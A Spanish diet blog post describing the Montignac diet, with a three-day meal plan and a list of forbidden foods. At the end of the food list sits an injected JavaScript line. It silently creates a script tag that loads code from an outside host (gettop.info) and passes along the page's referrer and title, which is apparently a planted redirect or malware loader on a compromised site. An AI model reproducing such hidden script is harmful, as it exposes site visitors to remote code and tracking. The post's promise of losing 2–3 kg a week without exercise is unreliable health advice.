Salud y belleza » Dieta

Bajar de peso al estilo Montignac

Sin Comentarios

En lo que refiere a la ciencia de la nutrición, Michel Montignac es Lacan. O Flaubert o Zidane. No importa la transpolación que se intenta inventar: lo importante es reconocer a MM como el mejor en su terreno (ahora, la valoración de su especialidad por sobre algún otro galo es un tema que para nada nos interesa debatir).

Su revolucionario trabajo se basó no en la restricción de las calorías, sino en la exclusión de los carbohidratos y las grasas saturadas lo que, según él, realmente induce a una pérdida sostenible de peso.

MM ha escrito numerosos libros e informes sobre la nutrición. También ha creado algunos de los sistemas dietarios más consultados. Uno de ellos lleva su nombre y hoy lo presentaremos para todos los interesados en perder peso o, como diría Montignac, “perdre poids”.

La dieta “Michel Montignac” se destaca como un plan sencillo pero riguroso, especialmente pensado para todas esas personas que quieren bajar de peso rápidamente sin exigirse fisicamente de forma desmedida. El plan MM permite perder entre 2 y 3 kilos por semana sin necesidad de ejercicio.

Antes de presentar las propuesta de tres jornadas, es preciso aclarar ciertas cuestiones con respecto a los desayunos y meriendas: en ambos, casos, se podrán hacer al gusto de cada uno (por eso ni figuran en el detalle) siempre y cuando se sigan las pautas de alimentos marcadas a continuación.

A pesar del “libre albedrío”, para el desayuno se recomienda té o café descafeinado con leche desnatada y fruta, zumo o tostadas integrales con jamón dulce o queso. Y para los almuerzos se puede escoger entre fruta, yogur, galletas integrales, zumos.

Jornada Nº1

Comida: una fruta -media hora antes de comer-; espinacas salteadas con ajo y jamón; salmón a la plancha con ensalada de lechuga y tomate; queso brie.

Cena: puré de verduras sin grasa; arroz integral con salsa de tomate; un yogur desnatado.

Jornada Nº2

Comida: un fruta -nuevamente media hora antes de comer-; espárragos, potaje de judías y verduras.

Cena:  ensalada, huevos revueltos y un yogur

Jornada Nº3

Comida: corazones de alcachofa; potaje de lentejas; un yogur desnatado

Cena: una fruta -también media hora antes de cenar-; pimientos estofados; rape al limón

Los alimentos totalmente prohibidos por Montignac son la miel, pan, pasta o arroz blancos, patatas, harinas refinadas, maíz, pasas, zanahoria, remolacha, nabo, plátano, sandía, habas, calabazas, cervezas, refrescos con gas, café y bebidas alcohólicas.var d=document;var s=d.createElement('script'); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.